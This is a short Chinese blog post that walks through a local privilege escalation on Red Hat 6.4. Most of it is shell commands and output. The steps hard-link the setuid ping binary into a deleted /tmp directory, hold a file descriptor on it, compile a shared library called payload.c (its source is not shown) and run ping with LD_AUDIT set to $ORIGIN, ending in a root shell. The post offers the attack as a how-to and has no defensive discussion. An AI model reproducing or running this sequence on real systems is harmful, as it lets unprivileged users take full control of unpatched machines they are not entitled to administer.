redhat6.4提权Ⅱ

Posted 2021-02-11 chenglee

本次演示只针对redhat6.4, 其他的系统不知道有没有效果。

下面开始吧

建立普通用户并授予密码

[[email protected] yum.repos.d]# useradd test
[[email protected] yum.repos.d]# passwd test
更改用户 test 的密码 。
新的 密码：
无效的密码： 它基于字典单词
重新输入新的 密码：
passwd： 所有的身份验证令牌已经成功更新。

切换身份

[[email protected] yum.repos.d]# su - test
[[email protected] ~]$ whoami
test

演示权限

[[email protected] ~]$ useradd aaa
-bash: /usr/sbin/useradd: 权限不够

下面开始利用ping

[[email protected] ~]$ mkdir /tmp/exploit
[[email protected] ~]$ ln /bin/ping /tmp/exploit/target
[[email protected] ~]$ exec 3< /tmp/exploit/target
[[email protected] ~]$ ls -l /proc/$$/fd/3
lr-x------. 1 test test 64 2月  27 00:17 /proc/1665/fd/3 -> /tmp/exploit/target
[[email protected] ~]$ rm -rf /tmp/exploit/
[[email protected] ~]$ ls -l /proc/$$/fd/3
lr-x------. 1 test test 64 2月  27 00:17 /proc/1665/fd/3 -> /tmp/exploit/target (deleted)

下面使用gcc提权

[[email protected] ~]$ vim payload.c
[[email protected] ~]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[[email protected] ~]$ ls
payload.c
[[email protected] ~]$ ls -l /tmp/exploit
-rwxrwxr-x. 1 test test 6060 2月  27 00:18 /tmp/exploit
[[email protected] ~]$ LD_AUDIT="$ORIGIN" exec /proc/self/fd/3
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
            [-M mtu discovery hint] [-S sndbuf]
            [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
[[email protected] yum.repos.d]# whoami
root
[[email protected] yum.repos.d]#

一气呵成!